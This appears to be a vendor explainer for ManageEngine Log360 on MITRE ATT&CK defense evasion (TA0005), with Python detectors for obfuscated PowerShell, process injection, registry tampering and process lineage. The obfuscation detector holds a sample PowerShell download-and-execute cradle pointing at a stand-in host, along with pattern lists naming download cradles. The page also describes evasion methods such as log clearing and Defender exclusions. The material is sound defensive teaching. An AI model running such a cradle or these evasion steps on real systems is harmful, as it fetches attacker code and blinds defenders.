What is defense evasion (TA0005)?

Defense evasion is the collection of techniques adversaries use to avoid detection, bypass security controls, and remove the evidence of their activity. In MITRE ATT&CK®, it maps to tactic TA0005 and holds the distinction of being the largest tactic in the framework by technique count. Log360 maps 963+ pre-built correlation rules to this tactic, covering Windows, Active Directory, AWS, Microsoft 365, and network device platforms.

The core challenge with defense evasion is that most techniques exploit trust relationships that already exist in the operating system. An attacker using Rundll32 to load a malicious DLL looks nearly identical to Windows doing the same thing for a legitimate library load. A process named svchost.exe running from a temp folder is suspicious, but the detection logic needs to know what legitimate svchost behavior looks like to surface that anomaly. This is why detection requires both rule-based correlation and behavioral baselines working together.

MITRE ATT&CK TA0005 — Defense evasion: Log360 covers this tactic with 963+ rules, the highest rule count of any MITRE ATT&CK tactic. Key techniques include masquerading (T1036), obfuscated files or information (T1027), indicator removal (T1070), process injection (T1055), modify registry (T1112), and hide artifacts (T1564). View the full rule set at the Log360 detection rules library.

Why it matters in 2026

Defense evasion does not generate the same headlines as ransomware or data breaches, but it is the reason those attacks succeed. A threat actor who can keep their tools hidden, their processes camouflaged, and their log trail clean will have free run of a network for days or weeks before any alert fires. The 2025 IBM Cost of a Data Breach Report found the global average dwell time for attackers who were not detected by the victim's own team was 194 days. Defense evasion is the primary reason that number stays so high.

Three reasons this tactic deserves dedicated detection investment:

  • It enables every other tactic. Credential access, lateral movement, and exfiltration all depend on the attacker remaining undetected long enough to operate. Defense evasion is the mechanism that buys that time.
  • Security tool tampering removes your visibility. When an attacker kills an endpoint agent, adds a Defender exclusion, or clears Security event logs, the gap in your SIEM is itself evidence of a breach. A silent endpoint is often more alarming than a noisy one.
  • LOLBin abuse is accelerating. Living-off-the-land techniques that abuse trusted Windows binaries have grown significantly as endpoint detection has improved. Using a signed Microsoft binary to proxy-execute a payload bypasses signature-based detection entirely, requiring behavioral correlation rules to catch it.

Defense evasion in the attack chain

Defense evasion does not occupy a fixed position in the kill chain. Attackers use it throughout an intrusion: immediately after initial access to remove phishing artifacts, during persistence establishment to hide new services or scheduled tasks, and during lateral movement to avoid triggering incident detection on remote hosts. It runs in parallel with every other tactic, not after it.

How defense evasion works

The 963+ TA0005 rules in Log360 cover dozens of sub-techniques. Six technique areas account for the largest share of real-world evasion activity and detection rule coverage in this cluster: masquerading, obfuscated files or information, indicator removal, process injection, modify registry, and hide artifacts.

1. Masquerading (T1036)

Masquerading covers any attempt to disguise a malicious file, process, or task as something legitimate. The simplest form is renaming a malware executable to a known-good process name like svchost.exe or explorer.exe and placing it in a system-like directory. More sophisticated variants involve naming malicious scheduled tasks or services after common Windows components so they blend into baseline noise.

Log360's masquerading detection covers 30+ rules, including several classified as Critical severity. Key behavioral indicators targeted include processes claiming to be system binaries but running from non-standard paths, explorer.exe spawned as a child process (which is not valid system behavior), and LOLBAS tool chains where wsmprovhost spawns unexpected children. The correlation engine matches process names against known-safe parent-child relationships and known-safe execution paths to surface these anomalies.

2. Obfuscated files or information (T1027)

Obfuscated files or information covers any method of encoding, encrypting, or structurally transforming payloads, scripts, and commands to defeat signature-based detection. PowerShell commands encoded in Base64, compile-after-delivery using csc.exe to produce malicious .NET assemblies on the victim host, software packing, and character-join command obfuscation all fall under T1027. Log360 maps 60+ correlation rules to this technique, with detection built around Script Block Logging (Event ID 4104) which captures deobfuscated content at execution time regardless of encoding method. Dedicated rules cover known obfuscation frameworks such as Invoke-Obfuscation and threat actor tooling including Winnti dropper activity.
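The paragraph makes two detection points that are easier to see in code: a Base64 -EncodedCommand hides nothing from a detector that decodes it, and a Script Block Logging record (Event ID 4104) already carries the plaintext, so the same content checks apply to both. The following Python is an added example written for this page, not Log360 rule content or Log360 code. The event dictionary layout, the `SUSPICIOUS_PATTERNS` list, the helper `encode_sample` (used only to build the constructed sample) and the sample script itself are assumptions made for the example.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand ("-e", "-ec",
# "-enc", ...), so match "-e<letters>" followed by a Base64 run. Look-alikes such
# as "-ExecutionPolicy Bypass" fail the decode step below and are ignored.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Plaintext patterns worth alerting on once the command is readable. This list is
# an assumption for the example, not Log360's rule content.
SUSPICIOUS_PATTERNS = {
    "iex": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.IGNORECASE),
    "nested-base64": re.compile(r"frombase64string", re.IGNORECASE),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE plaintext carried by -EncodedCommand, or None if nothing decodes."""
    for match in ENCODED_ARG.finditer(command_line):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not Base64, or not a PowerShell (UTF-16LE) payload
        if text and text.isprintable():
            return text
    return None


def score_plaintext(text: str) -> list[str]:
    """Names of the suspicious patterns present in readable script text."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)]


def analyze_event(event: dict) -> dict:
    """Normalise a 4688 (process creation) or 4104 (script block) record and flag it.
    4104 already carries the deobfuscated script; for 4688 we decode it ourselves and
    score both the outer command line and the decoded payload."""
    if event["EventID"] == 4104:
        plaintext, source = event["ScriptBlockText"], "script-block-log"
        hits = score_plaintext(plaintext)
    else:
        command_line = event["CommandLine"]
        decoded = decode_encoded_command(command_line)
        plaintext = decoded if decoded is not None else command_line
        source = "decoded-command-line" if decoded is not None else "command-line"
        hits = sorted(set(score_plaintext(command_line) + score_plaintext(plaintext)))
    return {"source": source, "plaintext": plaintext, "hits": hits, "suspicious": bool(hits)}


def encode_sample(script: str) -> str:
    """Build the -EncodedCommand form of a constructed sample so the example runs offline."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry); example.test is a reserved test domain.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/stage.ps1')"
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_sample(SAMPLE_SCRIPT)}"},
    {"EventID": 4104, "ScriptBlockText": SAMPLE_SCRIPT},
    {"EventID": 4688, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze_event(ev))
```

The first and second records carry the same script, once encoded on a 4688 command line and once in the clear in a 4104 record; both score the same content hits, which is the reason the text gives for building T1027 detection around Script Block Logging. The third record shows that a non-Base64 argument after `-E` does not produce a false decode.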

3. Indicator removal (T1070)

Indicator removal covers all actions designed to destroy forensic evidence: clearing Windows Security event logs (Event ID 1102), deleting .evtx log files directly, wiping PowerShell console history, removing web server access logs, and using secure deletion tools like SDelete to overwrite files before deletion. A key advantage of centralized SIEM architecture is that events forwarded before clearing occurs remain preserved — the local log clear cannot affect the SIEM record. Log360's indicator removal rules surface the clearing actions themselves, making the anti-forensic attempt self-evidencing.

4. Process injection (T1055)

Process injection covers techniques where adversaries inject malicious code into legitimate running processes, executing under the host process's security context and identity. Methods include DLL injection, process hollowing (creating a suspended legitimate process and replacing its memory with malicious code), thread execution hijacking, and shellcode injection via CreateRemoteThread. Detection relies on Sysmon Event ID 8 (CreateRemoteThread), Event ID 10 (ProcessAccess), and behavioral anomalies like network connections initiated by processes that have no legitimate reason to reach the network. Log360 maps 39+ rules to T1055.
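The three Sysmon signals named in this paragraph (Event ID 8 CreateRemoteThread, Event ID 10 ProcessAccess, and network connections from processes that should never make them) can be evaluated with a few field checks each. The Python below is an added example written for this page, not Log360 code. The field names follow Sysmon's schema; the `TRUSTED_SOURCES` allow-list, the `NO_NETWORK_EXPECTED` set, and all sample records are assumptions constructed for the example and would be tuned per environment.

```python
from pathlib import PureWindowsPath

# Access-mask bits needed to place and start code inside another process:
# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE (Win32 constants).
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020
USER_WRITABLE = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\")
# System processes that legitimately create threads in, or open handles to, other
# processes. Assumed allow-list for the example.
TRUSTED_SOURCES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe", "services.exe", "lsass.exe"}
# Processes with no business reason to reach the network. Assumed list for the example.
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate_sysmon_event(ev: dict) -> list[str]:
    """Return the reasons an event looks like injection; an empty list means benign."""
    reasons: list[str] = []
    eid = ev["EventID"]
    if eid == 8:  # CreateRemoteThread
        src = _name(ev["SourceImage"])
        if not ev.get("StartModule"):
            reasons.append("thread start address is not backed by a loaded module")
        if ev["SourceImage"].lower().startswith(USER_WRITABLE):
            reasons.append("source image runs from a user-writable path")
        if src not in TRUSTED_SOURCES:
            reasons.append(f"cross-process thread created by non-system process {src}")
    elif eid == 10:  # ProcessAccess
        granted = int(ev["GrantedAccess"], 16)
        if (granted & INJECTION_RIGHTS) == INJECTION_RIGHTS and _name(ev["SourceImage"]) not in TRUSTED_SOURCES:
            reasons.append(
                f"handle with thread-create and memory-write rights (0x{granted:x}) to {_name(ev['TargetImage'])}"
            )
    elif eid == 3:  # NetworkConnect
        if _name(ev["Image"]) in NO_NETWORK_EXPECTED:
            reasons.append(
                f"{_name(ev['Image'])} initiated a connection to {ev['DestinationIp']}:{ev['DestinationPort']}"
            )
    return reasons


# Constructed Sysmon records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\Public\loader.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": ""},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\conhost.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\loader.exe", "TargetImage": r"C:\Windows\System32\svchost.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Vendor\agent.exe", "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1000"},
    {"EventID": 3, "Image": r"C:\Windows\System32\notepad.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["EventID"], evaluate_sysmon_event(ev))
```

A thread whose start address has no backing module is the signal most specific to injected code; the path and allow-list checks add context rather than certainty, so the function returns every reason that applied and lets the rule severity be decided on the count.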

5. Modify registry (T1112)

Modify registry covers attacker interaction with the Windows Registry to disable security controls, store payloads, configure remote access, establish persistence, or disrupt forensic analysis. Targeted registry paths include Windows Defender policy keys, audit configuration, LSA authentication settings, and RDP configuration. Log360 maps 70+ rules to T1112 using Sysmon Event ID 12/13/14 for real-time registry change monitoring, covering tool-based detection (reg.exe, PowerShell registry cmdlets) and path-based detection (modifications to high-value keys regardless of the tool used).
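The distinction the paragraph draws between tool-based and path-based detection is worth seeing on real event shapes: a path-based rule fires on a watched key no matter which binary wrote it, and the tool name is recorded alongside as context. The Python below is an added example written for this page, not Log360 code or Log360 rule definitions. The field names follow Sysmon's registry events (12/13/14); the key paths are real Windows locations, but the grouping, severity labels, `REGISTRY_TOOLS` set and sample records are assumptions constructed for the example.

```python
from dataclasses import dataclass
from typing import Optional

# High-value registry locations grouped by the control they govern. Paths are real
# Windows keys; the grouping and severities are this example's assumptions.
WATCHED_KEYS = [
    ("defender-policy", r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender", "Critical"),
    ("defender-exclusions", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions", "Critical"),
    ("audit-policy", r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit", "Critical"),
    ("lsa", r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa", "Trouble"),
    ("rdp", r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server", "Trouble"),
]
# Writers whose registry changes count as "tool-based"; anything else is caught path-based.
REGISTRY_TOOLS = {"reg.exe", "regedit.exe", "powershell.exe", "pwsh.exe"}
SYSMON_REGISTRY_EVENTS = {12: "key created/deleted", 13: "value set", 14: "key/value renamed"}


@dataclass
class Finding:
    host: str
    control: str
    severity: str
    action: str
    image: str
    target: str
    details: str
    tool_based: bool


def classify_registry_event(ev: dict) -> Optional[Finding]:
    """Match one Sysmon 12/13/14 record against the watched key prefixes."""
    action = SYSMON_REGISTRY_EVENTS.get(ev["EventID"])
    if action is None:
        return None
    target = ev["TargetObject"]
    for control, prefix, severity in WATCHED_KEYS:
        if target.lower().startswith(prefix.lower()):
            image = ev["Image"].rsplit("\\", 1)[-1].lower()
            return Finding(ev["Computer"], control, severity, action, image, target,
                           ev.get("Details", ""), image in REGISTRY_TOOLS)
    return None


def scan_registry_events(events) -> list[Finding]:
    """Apply the classifier to a batch and keep only the hits."""
    return [f for f in map(classify_registry_event, events) if f is not None]


# Constructed Sysmon records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Users\Public\updater.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Computer": "WS01", "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"EventID": 12, "Computer": "WS02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public"},
]

if __name__ == "__main__":
    for finding in scan_registry_events(SAMPLE_EVENTS):
        print(finding)
```

The second record is the case the text calls out: an unknown binary, not reg.exe or PowerShell, writes an LSA value, and the path-based match still produces a finding (with `tool_based` False). The third record is an ordinary Run-key write outside the watched set and produces nothing.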

6. Hide artifacts (T1564)

Hide artifacts covers techniques that prevent malicious files, processes, and users from appearing through standard system enumeration. Methods include setting Hidden and System file attributes with attrib.exe, storing executables in NTFS alternate data streams invisible to directory listings, running processes with hidden windows (-WindowStyle Hidden), creating hidden user accounts, and running malicious workloads inside Hyper-V virtual machines invisible to host monitoring. Log360 maps 35+ rules to T1564, catching concealment actions at the moment they are applied.


Key techniques under TA0005

The table below summarizes the six defense evasion technique areas covered in this cluster, along with detection difficulty and Log360's rule coverage for each:

Technique | Description | Platforms | Detection difficulty | Log360 coverage
T1036 — Masquerading | Disguises malicious processes, files, or tasks as legitimate system components through binary renaming and wrong-path execution | Windows | Medium — execution paths and parent-child anomalies are detectable with behavioral rules | 30+ rules: binary rename detection, process masquerading, LOLBAS abuse, suspicious execution paths
T1027 — Obfuscated files or information | Encodes, encrypts, or transforms payloads and scripts to defeat signature-based detection and static analysis | Windows, Sysmon | High for static detection — behavioral detection via Script Block Logging remains effective regardless of encoding method | 60+ rules: PowerShell obfuscation, compile-after-delivery artifacts, Invoke-Obfuscation variants, encoded command detection
T1070 — Indicator removal | Destroys forensic artifacts including event logs, malware files, web server logs, and PowerShell history to impede investigation | Windows | Low — the clearing actions themselves generate detectable events; centralized SIEM preserves evidence before clearing | 45+ rules: Security log cleared (Event ID 1102), EVTX file deletion, SDelete execution, web server log deletion
T1055 — Process injection | Injects malicious code into legitimate running processes to execute under a trusted process identity and evade process-level detection | Windows, Sysmon | High — memory-resident code with no disk presence; requires Sysmon CreateRemoteThread and ProcessAccess monitoring | 39+ rules: CreateRemoteThread detection, process hollowing indicators, unexpected network connections from host processes
T1112 — Modify registry | Modifies the Windows Registry to disable security controls, store payloads, configure remote access, and establish persistence | Windows, Sysmon | Medium — Sysmon registry events provide real-time detection; path-based rules catch modifications regardless of tool used | 70+ rules: reg.exe suspicious paths, RDP configuration tampering, ShimCache flush, security tool disabling via registry
T1564 — Hide artifacts | Prevents malicious files, processes, and users from appearing in standard system enumeration tools through NTFS ADS, hidden attributes, and hidden windows | Windows, Sysmon | Medium — hiding actions produce detectable events; catching concealment at application time is more reliable than enumerating hidden content | 35+ rules: NTFS alternate data stream detection, attrib.exe hidden flag, PowerShell WindowStyle Hidden, Hyper-V cmdlet abuse

Detection strategies for defense evasion

Defense evasion detection requires a layered approach. No single detection method is sufficient on its own, because the techniques are specifically designed to defeat individual controls. The layers below are complementary; each addresses a different class of evasion behavior.

Layer 1: Process behavioral analysis

The majority of defense evasion activity on Windows endpoints leaves a trace in process creation events (Event ID 4688 or Sysmon Event ID 1). Parent-child process relationships, process names relative to execution paths, and command-line argument patterns are the primary detection surfaces. Collecting these events into a SIEM and applying correlation rules that encode expected process lineage is the foundation of defense evasion detection.

Key fields to capture and correlate:

  • Process name vs. execution path: svchost.exe running from C:\Users\Public is not a legitimate system process. Log360 compares process names against expected parent directories for all high-value system binaries.
  • Parent-child legitimacy: Office applications spawning cmd.exe or wscript.exe is almost never legitimate behavior in a secure environment. Log360 ships rules for all major Office-spawning-script patterns classified as Critical.
  • Command-line arguments: Encoded PowerShell (-EncodedCommand), DLL loads from temp paths via Rundll32, and regsvr32 with /s /u flags are high-signal patterns covered by dedicated rules.
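The three detection surfaces in this list (name versus path, parent-child legitimacy, and command-line patterns) all read from the same process creation record, so one function can evaluate them together. The Python below is an added example written for this page, not Log360's correlation engine or its rule definitions. The record layout (`Image`, `ParentImage`, `CommandLine`, as Sysmon names them), the expected-directory map, the Office and script-host sets, and the sample records are assumptions constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Where each high-value system binary is allowed to live (lower-case, no trailing slash).
SYSTEM_BINARY_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}

# Command-line patterns from the list above: encoded PowerShell, Rundll32 loading a
# DLL from a user-writable path, regsvr32 with the silent and uninstall switches.
COMMAND_LINE_RULES = [
    ("encoded-powershell", re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", re.I)),
    ("rundll32-user-writable-path",
     re.compile(r"rundll32(?:\.exe)?\s+\"?(?:c:\\users\\|c:\\windows\\temp\\|c:\\programdata\\)", re.I)),
    ("regsvr32-silent-uninstall", re.compile(r"regsvr32(?:\.exe)?\s.*(?:/s\s+/u|/u\s+/s)", re.I)),
]


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _folder(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def evaluate_process_event(ev: dict) -> list[tuple[str, str]]:
    """Return (rule, severity) pairs that fire for one 4688 / Sysmon Event ID 1 record."""
    findings: list[tuple[str, str]] = []
    name, parent, folder = _name(ev["Image"]), _name(ev["ParentImage"]), _folder(ev["Image"])
    # 1. Process name vs. execution path.
    if name in SYSTEM_BINARY_DIRS and folder not in SYSTEM_BINARY_DIRS[name]:
        findings.append(("system-binary-wrong-path", "Critical"))
    # 2. Parent-child legitimacy.
    if parent in OFFICE_APPS and name in SCRIPT_HOSTS:
        findings.append(("office-spawns-script-host", "Critical"))
    if name == "explorer.exe" and parent not in EXPLORER_PARENTS:
        findings.append(("explorer-unexpected-parent", "Critical"))
    # 3. Command-line argument patterns.
    for rule, pattern in COMMAND_LINE_RULES:
        if pattern.search(ev["CommandLine"]):
            findings.append((rule, "Trouble"))
    return findings


# Constructed process creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\svchost.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + "A" * 40},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Users\Public\update.dll,Start"},
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\App\lib.dll"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_name(ev["Image"]), evaluate_process_event(ev))
```

The last two records are the baseline the text says the logic must know: svchost.exe from System32 under services.exe, and an installer registering a DLL with `/s` alone, both produce no findings, while the same names from the wrong folder or with the wrong parent do.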

Layer 2: Security control integrity monitoring

When an attacker modifies your security tooling, the modification itself is detectable. Audit policy changes (Event ID 4719), Defender real-time protection disabling (Windows Defender operational log), and service stop commands against known security processes all produce discrete log events that Log360 monitors with dedicated security monitoring rules. Treat any of these events as a high-priority investigation trigger.

Layer 3: Log integrity monitoring

Log clearing is a classic defense evasion sub-technique. Event ID 1102 (Security log cleared) and Event ID 104 (System log cleared) are single-event indicators that require no threshold or aggregation logic: one occurrence is a high-severity finding. Log360 monitors both events continuously and fires an immediate alert on detection. Gaps in log continuity (a host that stops forwarding logs unexpectedly) are also surfaced through Log360's log collection health monitoring.

Layer 4: UEBA behavioral baselines

The most sophisticated defense evasion techniques produce no discrete high-confidence events. An attacker who uses legitimate credentials, legitimate tools, and legitimate processes, but in slightly unusual patterns, requires behavioral detection. Log360's UEBA engine builds per-entity baselines covering process execution patterns, network connection profiles, and resource access behavior. Deviations from these baselines, even subtle ones, generate risk scores that surface for analyst review.
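The baseline-and-deviation idea in this paragraph is easiest to understand as a small scoring model: learn what an entity normally runs and when, then score each new event by how far it departs from that history. The Python below is an added example written for this page; it is not Log360's UEBA engine and its point weights, `REVIEW_THRESHOLD` and `RARE_FRACTION` are assumptions chosen for illustration. The training history is constructed inside the block.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

REVIEW_THRESHOLD = 50   # assumed risk score at which an analyst takes a look
RARE_FRACTION = 0.01    # a process seen in under 1% of an entity's events counts as rare


class EntityBaseline:
    """What one entity (a user here) normally runs and at which hours, learned from history."""

    def __init__(self) -> None:
        self.processes: Counter = Counter()
        self.hours: Counter = Counter()
        self.total = 0

    def learn(self, ev: dict) -> None:
        self.processes[ev["process"].lower()] += 1
        self.hours[ev["time"].hour] += 1
        self.total += 1

    def score(self, ev: dict) -> tuple[int, list[str]]:
        """Risk points plus the reasons behind them; 0 means the event fits the baseline."""
        if self.total == 0:
            return 0, ["no baseline for this entity yet"]
        score, reasons = 0, []
        proc, hour = ev["process"].lower(), ev["time"].hour
        if proc not in self.processes:
            score += 40
            reasons.append(f"never-seen process {proc}")
        elif self.processes[proc] / self.total < RARE_FRACTION:
            score += 20
            reasons.append(f"rare process {proc}")
        if self.hours[hour] == 0:
            score += 30
            reasons.append(f"no prior activity at hour {hour:02d}")
        return score, reasons


class Ueba:
    """Per-entity baselines keyed by user name."""

    def __init__(self) -> None:
        self.entities: defaultdict = defaultdict(EntityBaseline)

    def train(self, events) -> None:
        for ev in events:
            self.entities[ev["user"]].learn(ev)

    def evaluate(self, ev: dict) -> dict:
        score, reasons = self.entities[ev["user"]].score(ev)
        return {"user": ev["user"], "score": score, "reasons": reasons,
                "review": score >= REVIEW_THRESHOLD}


def constructed_history() -> list[dict]:
    """Twenty days of 'alice' running four applications between 08:00 and 17:00, plus one calc.exe."""
    start = datetime(2026, 1, 5, 8, 0)
    history = [{"user": "alice", "process": p, "time": start + timedelta(days=d, hours=h)}
               for d in range(20) for h in range(10)
               for p in ("outlook.exe", "winword.exe", "chrome.exe", "teams.exe")]
    history.append({"user": "alice", "process": "calc.exe", "time": start + timedelta(days=3, hours=2)})
    return history


if __name__ == "__main__":
    model = Ueba()
    model.train(constructed_history())
    print(model.evaluate({"user": "alice", "process": "attrib.exe", "time": datetime(2026, 1, 30, 3, 15)}))
    print(model.evaluate({"user": "alice", "process": "chrome.exe", "time": datetime(2026, 1, 30, 10, 0)}))
```

Note what crosses the threshold: a tool the user has never run, at an hour with no history, scores 70 and is queued for review, whereas a familiar application at an unusual hour scores only 30. Each deviation is weak evidence on its own; the accumulation is what makes the event stand out, which is the point the paragraph makes about subtle deviations.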

[Figure: Log360 Manage Rules interface showing the Rule Summary panel for the "Suspicious Rundll32 Execution With Image Extension" detection rule, mapped to MITRE ATT&CK Defense Evasion (TA0005) and Rundll32 (T1218.011). The rule detects Rundll32.exe executing DLL files masquerading as image files (a T1036 masquerading technique); severity Trouble, log format Windows and Sysmon, execution type continuous.]
Log360's pre-built defense evasion detection rule for Rundll32 executing DLLs disguised as image files, mapped to TA0005 and T1218.011, with full rule criteria and MITRE ATT&CK context.

Log360 detection rules — TA0005 reference

Log360 ships 963+ correlation rules mapped to TA0005 defense evasion. The table below lists the highest-signal rules across the six technique areas covered in this cluster, sorted by technique.

Rule name | Technique | Platform | Severity
Windows masquerading explorer as child process | T1036 — Masquerading | Windows | Critical
Wsmprovhost LOLBAS execution process spawn | T1036 — Masquerading | Windows | Critical
Potential Winnti Dropper Activity | T1027 — Obfuscated files | Sysmon, Windows | Critical
Invoke-Obfuscation RUNDLL LAUNCHER | T1027 — Obfuscated files | Windows | Trouble
Security Eventlog Cleared | T1070 — Indicator removal | Windows | Critical
EventLog EVTX File Deleted | T1070 — Indicator removal | Windows | Critical
PowerShell ShellCode | T1055 — Process injection | Windows | Critical
Potential Pikabot Hollowing Activity | T1055 — Process injection | Sysmon, Windows | Critical
RestrictedAdminMode Registry Value Tampering | T1112 — Modify registry | Sysmon, Windows | Trouble
Reg Add Suspicious Paths | T1112 — Modify registry | Sysmon, Windows | Trouble
NTFS Alternate Data Stream | T1564 — Hide artifacts | Windows | Trouble
Suspicious PowerShell WindowStyle Option | T1564 — Hide artifacts | Windows | Trouble

Note: This table shows a representative subset of Log360's TA0005 detection rules. Log360 ships 963+ rules mapped to the defense evasion tactic across all six technique areas in this cluster. The full rule library, including prerequisites, mitigation steps, and MITRE ATT&CK references for each rule, is available at Log360's detection rule library.

Investigation and response

When a defense evasion alert fires, the immediate goal is to determine whether the evasion attempt is part of an active intrusion or an isolated misconfiguration. Speed matters: an attacker who has successfully impaired defenses is in an unmonitored state. Response time is measured in minutes, not hours.

Investigation checklist

  1. Identify the process and account: What process triggered the alert? What user account was associated with it? Check whether this account has made similar requests before and whether it is expected to run the triggering process.
  2. Check the execution path: Is the binary running from its expected location? A process named svchost.exe in C:\Users or C:\Temp is a red flag regardless of the name match. Validate the path against the known-good baseline.
  3. Review the process lineage: What spawned the suspicious process? Office applications spawning cmd.exe or PowerShell are high-confidence indicators of a macro dropper or phishing payload. Trace back to the root parent.
  4. Assess the scope of evasion: What specifically was the attacker trying to hide? Log clearing (T1070) suggests an attempt to destroy forensic history. Registry tampering (T1112) may indicate persistence or security tool disabling. Process injection (T1055) suggests code is running under a legitimate process identity. Obfuscated execution (T1027) indicates payload delivery was attempted. Follow the alert context to determine which evasion layer was activated.
  5. Search for concurrent activity: Defense evasion does not occur in isolation. Query Log360 for correlated events on the same host within the same 30-minute window: new scheduled tasks, registry modifications, outbound connections to uncommon destinations, and new account creations are all relevant.
  6. Determine lateral scope: If the affected host is not isolated, check whether the evasion-enabling activity has been replicated to other hosts (e.g., GPO-deployed Defender exclusions, domain-wide service stops via PsExec, or a deployment to multiple endpoints via a compromised management tool).

Response actions

  • Immediate containment: If evasion is confirmed as part of an active intrusion, isolate the affected host. Re-enable any disabled security controls and restore audit policy settings before detaching from the network, so that subsequent forensic collection captures complete telemetry.
  • Restore security controls: Re-enable Defender real-time protection, restore the modified audit policy to baseline, and restart any stopped security services. Verify that endpoint agent heartbeats resume from the host.
  • Preserve evidence: Capture memory and disk images before remediation if forensic analysis is required. Defense evasion techniques often destroy log evidence as part of their operation, so collect volatile data first.
  • Threat hunt for persistence: Assume that any successful defense evasion attempt had a follow-on phase. Hunt for new scheduled tasks, new services, new startup registry entries, and new local admin accounts created in the same timeframe on the affected host and its network neighbors.
  • Review registry and GPO changes: For T1112 (modify registry) events that affect multiple hosts simultaneously, check whether the change originated from a group policy modification or a deployment tool. Domain-wide registry changes to security policy keys are a high-severity finding requiring immediate Active Directory investigation.

ManageEngine Log360 for defense evasion detection

